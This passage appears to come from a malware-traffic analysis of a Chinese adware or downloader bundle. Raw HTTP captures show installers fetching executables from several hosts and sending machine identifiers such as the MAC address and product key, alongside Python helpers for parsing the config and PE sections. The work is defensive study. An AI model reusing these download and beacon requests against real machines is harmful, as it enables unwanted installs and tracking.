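        text = text.split("?>", 1)[1]
    return ET.fromstring(text)


def scalar_values(root) -> dict:
    """Top-level scalar settings (everything except the <check> items)."""
    return {el.tag: (el.text or "").strip() for el in root if el.tag != "check"}


def build_download_url(root, *format_args) -> str:
    """DownloadUrl + ProExe with the {0}/{1} placeholders filled the way
    .NET String.Format would; Python's str.format uses the same syntax."""
    v = scalar_values(root)
    return v["DownloadUrl"] + v["ProExe"].format(*format_args)


def url_elements(root) -> dict:
    """Element name -> parsed URL for every element whose text is a URL."""
    return {el.tag: urlsplit(el.text.strip())
            for el in root.iter() if el.text and "://" in el.text}


def referenced_hosts(root) -> set:
    return {u.hostname for u in url_elements(root).values()}


def nonstandard_ports(root) -> dict:
    """Element name -> port for URLs that do not use 80 or 443."""
    return {tag: u.port for tag, u in url_elements(root).items()
            if u.port not in (None, 80, 443)}


def check_items(root) -> list:
    """The optional-install checkboxes: visible, pre-selected, extra download."""
    return [{c.tag: (c.text or "").strip() for c in chk} for chk in root.findall("check")]


if __name__ == "__main__":
    cfg = load_config(CONFIG_XML)
    # lmarkid=83 was sent in the request for this config; the observed
    # download was /ktv/9158chat2_ktv083_98200205.exe, so {0}=83, {1}=98200205.
    print(build_download_url(cfg, "83", "98200205"))
    print("hosts:", sorted(referenced_hosts(cfg)))
    print("non-standard ports:", nonstandard_ports(cfg))
    print("checkboxes:", check_items(cfg))
```

Both checkboxes are visible and pre-selected with an empty downUrl, so in this capture they add no extra payload; a config with a downUrl filled in would be the place to look for further bundled installers.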

GET /temp/downloaderico/main.ico HTTP/1.1

User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:39 GMT
Cache-Control: No-cache
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:61cd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 zjjhdx33:8106 (Cdn Cache Server V2.0), 1.1 td48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
[binary body not reproduced: Windows icon (image/x-icon), 17542 bytes]

<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1

User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:45 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml">
<head><title>...............</title></head>
<body>
  <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb+iSnRqd8R7Q==" />
    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />
    <div style="text-align:center">
      <img title="webgo"
    </div>
  </form>
</body>
</html>
(the title holds GB2312 text the dump did not render; the unterminated img tag is as served)

<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1

User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:51 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml">
<head><title>...............</title></head>
<body>
  <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb+iSnRqd8R7Q==" />
    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />
    <div style="text-align:center">
      <img title="webgo"
    </div>
  </form>
</body>
</html>
(same page as the status=1 response above; only the echoed query string differs)

<<< skipped >>>

GET /dts/css/client/game1/log.jpg HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:31:26 GMT
Date: Wed, 10 Dec 2014 03:31:26 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 50696
Last-Modified: Wed, 23 Apr 2014 06:14:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8104 (Cdn Cache Server V2.0), 1.1 kf48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
[binary body not reproduced: JFIF/JPEG image, 50696 bytes]

<<< skipped >>>

GET /fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 HTTP/1.1
Referer: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jafaye.ynhaoya.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.5
Date: Sat, 20 Dec 2014 05:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 108632
Connection: keep-alive
X-Request-Id: 8879884559421a09a3cbc32ffd33f322; 320f88ff09ff646b1525c149da6c721c; 95be69e69653739102feb611ad7193c3; 3a87dfe84c736c89a24068822ded4f09
X-Source: U/200
Last-Modified: Sat, 20 Dec 2014 04:47:14 GMT
Expires: Sat, 27 Dec 2014 06:31:18 GMT
Cache-Control: max-age=611038
Accept-Ranges: bytes
Age: 1589
X-Cache: MISS|HIT from ctn-zj-hgh-098; MISS|HIT from ctn-gd-zhs-006; HIT from usn-us-vcv-130
Content-Disposition: attachment; filename=1419052427l238l63518.exe
[binary body not reproduced: PE32 executable, 108632 bytes. The dump shows the MZ/PE headers, a Rich header and a section table of .text, .rdata, .data, .ndata, .rsrc; a .ndata section is characteristic of NSIS-built installers.]

<<< skipped >>>
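Every executable body in this capture (fstp.exe above, and yx_dts.exe, OfficeAssist.0419.80.1123.exe and 9158chat2_ktv083_98200205.exe further down) shows the same section table: .text, .rdata, .data, .ndata, .rsrc. A .ndata section is the mark of an NSIS-built installer, which agrees with the NSIS_Inetc and NSISDL User-Agents the downloaders send. The Python below is an added example, not part of the report: a small PE section-table reader and an NSIS check. The dumps on this page are too lossy to feed to it directly, so the input is a constructed headers-only PE32 image that the same block builds; on a real sample you would pass the file's bytes.

```python
import struct

SECTION_HEADER = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def pe_section_names(data: bytes) -> list:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table
    and return the section names in file order."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]     # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    if len(data) < table + 40 * n_sections:
        raise ValueError("section table runs past end of data")
    names = []
    for i in range(n_sections):
        raw = struct.unpack_from("<8s", data, table + 40 * i)[0]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_like_nsis(data: bytes) -> bool:
    """NSIS-built executables carry their payload in a section named .ndata."""
    return ".ndata" in pe_section_names(data)


def build_sample_pe(section_names) -> bytes:
    """Constructed fixture: a headers-only PE32 image with the given section
    table. It is not loadable; it exists so the parser can run offline
    without any of the files from the capture."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE header follows the DOS header
    opt_size = 224                                  # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    table = b"".join(
        struct.pack(SECTION_HEADER, name.encode("ascii").ljust(8, b"\0"),
                    0, 0x1000 * (i + 1), 0, 0, 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names)
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Section layout seen in the dumps on this page vs. a layout without .ndata.
SAMPLE_NSIS = build_sample_pe([".text", ".rdata", ".data", ".ndata", ".rsrc"])
SAMPLE_PLAIN = build_sample_pe([".text", ".rdata", ".data", ".rsrc"])

if __name__ == "__main__":
    for label, blob in (("nsis-like", SAMPLE_NSIS), ("plain", SAMPLE_PLAIN)):
        print(label, pe_section_names(blob), "NSIS:", looks_like_nsis(blob))
```

The section-name test is a triage heuristic, not proof: a packer can rename sections, and an NSIS stub is only the wrapper, so the interesting question for each of these downloads is what the embedded script extracts and runs.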

GET /dts/css/client/game1.css?t=1419052484 HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:46 GMT
Server: nginx/1.4.2
Content-Type: text/css
Content-Length: 8315
Last-Modified: Sat, 13 Dec 2014 06:42:52 GMT
ETag: "548bdfec-207b"
Expires: Mon, 19 Jan 2015 05:14:47 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
X-Via: 1.1 zjjhdx32:8106 (Cdn Cache Server V2.0), 1.1 kf49:4 (Cdn Cache Server V2.0)
Connection: keep-alive
idth:606px;height:395px;overflow:hidden;color:#66554b;background:#000;
}...log {background:url(game1/main.jpg) no-repeat;}...reg {background:
url(game1/main.jpg) no-repeat;}...server {background:url(game1/server.
jpg) no-repeat;}...history {background:url(game1/history.jpg) no-repea
t;}../* log */../* kv */...kv-focus {width:221px;height:131px;overflow
:hidden;position:absolute;top:4px;right:7px;}...log-kv {position:relat
ive;width:221px;height:131px;overflow:hidden;}...log-kv img {vertical-
align:bottom;width:221px;height:131px;}...log-kv-nav {position:absolut
e;bottom:2px;right:5px;}...log-kv-nav a {float:left;display:block;back
ground-color:#fff;color:#000;padding:2px 8px;margin-right:5px;_display
:inline;text-indent:-9999px;font-size: 0;}...log-kv-nav .focus, .log-k
v-nav a:hover {background-color:#fd8800;color:#fff;text-decoration:non
e;}../* news */...news-tab {display:none;}...news {width:350px;height:
135px;overflow:hidden;position:absolute;top:34px;left:10px;}...news li
{padding:0 10px 0 16px;height:23px;border-bottom:0;line-height:24px;b
ackground:url(game1/dot.jpg) no-repeat left center;}...news li a {disp
l@charset "utf-8";..html, body, div, span, iframe,h1, h2, p, blockquot
e, pre,abbr, em, img, samp,small, strong, sub,b, i,dl, dt, dd, ul, li,
..fieldset, form, label, legend,table, caption, tbody, tfoot, thead, t
r, th, td,article, aside, canvas, details, figcaption, ..figure, foote
r, header,hgroup, menu, nav, section, summary {margin:0;padding:0;bord
er:0;outline:0;}..a, input, button {padding:0;margin:0;outline:0;b

<<< skipped >>>

GET /dts/css/client/game1/main.jpg HTTP/1.1

Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:30:47 GMT
Date: Wed, 10 Dec 2014 03:30:47 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 52706
Last-Modified: Thu, 05 Jun 2014 07:17:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8107 (Cdn Cache Server V2.0), 1.1 kf50:8 (Cdn Cache Server V2.0)
Connection: keep-alive
[binary body not reproduced: JFIF/JPEG image, 52706 bytes]

<<< skipped >>>

GET /yx_dts.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 915216
Content-Type: application/octet-stream
Last-Modified: Thu, 18 Dec 2014 08:27:47 GMT
Accept-Ranges: bytes
ETag: "2c1fe2809c1ad01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:36 GMT
[binary body not reproduced: PE32 executable, 915216 bytes. The dump shows the MZ/PE headers, a Rich header and a section table of .text, .rdata, .data, .ndata, .rsrc, the same NSIS-style layout as the other executables in this capture.]

<<< skipped >>>

GET /OfficeAssist.0419.80.1123.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 3696856
Content-Type: application/octet-stream
Last-Modified: Fri, 19 Dec 2014 12:34:18 GMT
Accept-Ranges: bytes
ETag: "22d7c1b881bd01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:41 GMT
[binary body not reproduced: PE32 executable, 3696856 bytes. The dump shows the MZ/PE headers, a Rich header and a section table of .text, .rdata, .data, .ndata, .rsrc, the same NSIS-style layout as the other executables in this capture.]

<<< skipped >>>

GET /RzuoiTP HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: t.cn
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Location: hXXps://pchome.b0.upaiyun.com/2.ico
Content-Type: text/html;charset=UTF-8
Server: weibo
Content-Length: 217
Date: Sat, 20 Dec 2014 05:13:50 GMT
X-Varnish: 2548699336
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="hXXps://pchome.b0.upaiyun.com/2.ico">here</A>.
</BODY>
</HTML>


GET /controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gameapp.37.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Dec 2014 05:14:44 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ea0f103f76d0c56ec96c6b4448e34036; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sq_client_data=a%3A6%3A%7Bs%3A7%3A%22game_id%22%3Bs%3A3%3A%22237%22%3Bs%3A5%3A%22refer%22%3Bs%3A10%3A%22feitian_wd%22%3Bs%3A3%3A%22uid%22%3Bs%3A6%3A%22905848%22%3Bs%3A13%3A%22showlogintype%22%3Bs%3A1%3A%223%22%3Bs%3A8%3A%22tpl_type%22%3Bs%3A5%3A%22game1%22%3Bs%3A11%3A%22installtime%22%3Bs%3A8%3A%2220141220%22%3B%7D; path=/; domain=37.com
Set-Cookie: client_type=3; path=/; domain=37.com
37web: zs_12_18_web
2548..<!doctype html>.<html lang="en">.<head>.    &l
t;meta charset="UTF-8" />. <title>......</title>.
<link rel="stylesheet" href="hXXp://img1.37wanimg.com/dts/css/clie
nt/game1.css?t=1419052484" />.</head>.<body data-gameid="2
37">. <div class="container log relative">. <div
class="log-form relative">. <p>. &
lt;label for="log-username">.........</label>.
<input type="text" name="log-username" id="log-username" class="lo
g-username"/><span class="status"></span>. &
lt;/p>. <7.com/zt/dts/20141209/" target="_blank">&
lt;img src="hXXp://img2.37wanimg.com/2014/12/101215116dbQk.jpg" alt=""
/></a>.. </div>..
<div class="log-kv-panel">.. <a h
ref="hXXp://dts.37.com/xinwen_20141204_4739/" target="_blank"><i
mg src="hXXp://img2.37wanimg.com/2014/12/04190114Mvpaw.jpg" alt=""/>
;</a>.. </div>..
<div class="log-kv-panel">.. <a href=
"hXXp://huodong.37.com/zt/dts/20141203/" target="_blank"><img sr
c="hXXp://img2.37wanimg.com/2014/11/19204027FVrEy.jpg" alt=""/><
/a>.. </div>..
<div class="log-kv-panel">.. <a href="http
://dts.37.com/dq/" target="_blank"><img src="hXXp://img2.37w

<<< skipped >>>

GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 20 Dec 2014 05:14:50 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=1654165040; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Mon, 15 Dec 2014 01:30:00 GMT
Content-type: text/html
Content-Length: 5305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8"><style type="tex
t/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial
,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-hei
ght:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0
10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.bt
n_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px
;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background
:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-re
peat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptl
ogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list
_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/
style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:n
one;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-
word;min-height:20px;clear:both}#list_uin li input{float:left;margin-b
ottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;wid
th:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;c
olor:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style
><script>var g_begTime=new Date();..(function(){...window.one
rror = function(msg,url,line){....var t = document.createElement('

<<< skipped >>>

GET /yx/dts/sqft/905848/app.ini HTTP/1.1
User-Agent: HTTPDownloader
Host: d.wanyouxi7.com


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Length: 61
Accept-Ranges: bytes
Content-Type: application/octet-stream
Last-Modified: Thu, 13 Nov 2014 07:23:49 GMT
ETag: "54645c85-3d"
X-Cache: HIT from p05.i01
X-Cache: HIT from c02.i05.
[version]
currentversion=3.0.0.0
[recommend]
link=
linkname=


GET /iplookup/iplookup.php HTTP/1.0
Host: int.dpool.sina.com.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:13:54 GMT
Server: Apache
Set-Cookie: U_TRS1=00000026.d6097b1e.54950592.07e9c9db; path=/; expires=Tue, 17-Dec-24 05:13:54 GMT; domain=.sina.com.cn
Set-Cookie: U_TRS2=00000026.d6117b1e.54950592.a16e5f72; path=/; domain=.sina.com.cn
Cache-Control: max-age=120
Expires: Sat, 20 Dec 2014 05:15:54 GMT
DPOOL_HEADER: 10.79.112.38
Content-Length: 26
Connection: close
Content-Type: text/html; charset=GBK
SINA-LB:aGEuMTA4LmczLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZDc5MjljY2UgMCAwIDAgNCAwCg==
1.-1.-1.....................


GET /ktv/9158chat2_ktv083_98200205.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive


HTTP/1.0 200 OK
Date: Sat, 20 Dec 2014 05:12:45 GMT
Content-Type: application/octet-stream
ETag: "386472367"
Accept-Ranges: bytes
Last-Modified: Thu, 18 Dec 2014 07:15:44 GMT
Content-Length: 15062552
Server: WS CDN Server
Age: 126
Via: 1.0 hbjm166:80 (Cdn Cache Server V2.0), 1.0 nanning16:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
[binary body not reproduced: PE32 executable, 15062552 bytes. The dump shows the MZ/PE headers, a Rich header and a section table of .text, .rdata, .data, .ndata, .rsrc, the same NSIS-style layout as the other executables in this capture.]

<<< skipped >>>

GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:50 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body style=" margin:0px">.. <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />..</div>.. <div>.. .. <object >.. .. <embed src="http://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>.. </object>.. .. </div>.. </form>..</body>..</html>....


GET /controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 HTTP/1.1
User-Agent: HTTPDownloader
Host: a.clickdata.37wan.com


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2757cfd3a4293290c5b7afd7714204f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
1..1..0..


GET /mmliao/MM-liao8398.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: show.man1234.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Sat, 20 Dec 2014 05:13:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe
Set-Cookie: ASP.NET_SessionId=w2k1ic55pk0pnr45szporcfn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 804
